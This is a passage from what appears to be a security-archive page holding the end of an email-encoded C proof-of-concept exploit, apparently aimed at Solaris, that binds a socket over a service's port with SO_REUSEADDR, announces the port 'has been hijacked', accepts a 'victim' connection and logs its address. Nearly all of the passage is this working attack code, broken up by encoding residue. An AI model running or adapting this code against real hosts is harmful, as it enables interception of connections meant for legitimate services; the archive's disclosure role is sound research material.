sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
break;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
case 'p':<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
port =3D atoi(optarg);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if((port < 1024) || (port > 65535)) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
puts("\n[-] Failed: Port number just isn't right!\n");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
usage(argc, argv);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;
_exit(EXIT_FAILURE);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
break;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
case 'v':<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
usage(argc, argv);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
break;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
default:<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
usage(argc, argv);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
break;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(vulnerable =3D=3D NULL) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s->
%sJacking port %s[%d] %sat address %s[%s]%s\n", WH, NO, PI, port, NO,
PU, vulnerable, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; jacksock =3D socket(AF_INET, SOC=
K_STREAM, 0);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(jacksock < 0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("socket");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } sleep(2);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(setsockopt(jacksock,
SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("setsockopt");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; solaris.sin_family =3D AF_INET;<=
br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; solaris.sin_port =3D htons(port)=
;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; solaris.sin_addr.s_addr =3D inet=
_addr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset(&solaris.sin_zero, '\=
0', sizeof(solaris.sin_zero));<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(bind(jacksock, (struct sockad=
dr *)&solaris, sizeof(struct sockaddr)) < 0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("bind");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;
fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be
patched!\n", RE, NO);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s->
%s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-> %sWait...\n"=
,
WH, NO, YE, NO, PI, port, NO, WH, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(listen(jacksock, MAX_INCONN) =
< 0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("listen");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;
puts("[-] Failed: Could not listen for an incoming connection!");=
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } sleep(2);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "%s->
%sOK, listening for incoming connections to compromise", WH, NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; inbuf =3D sizeof(victims);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(accept(jacksock, (struct sock=
addr *)&victims, &inbuf) < 0) {<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; perror("accept");<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;
puts("[-] Failed: Could not accept the incoming connection!");<br=
>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; jackerr(vulnerable);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, "\n%s->
%sSnagged a victim connecting from %s[%s]%s\n", WH, NO, YE,
inet_ntoa(victims.sin_addr), NO);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sleep(1);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; close(jacksock);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; puts("-> Victim has been=
released to live another day!");<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sleep(1);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; puts("-> Test was a succ=
ess!");<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; free(vulnerable);<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return(0);<br>
}<br>
<br>

------=_Part_12546_22614564.1120652641174--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close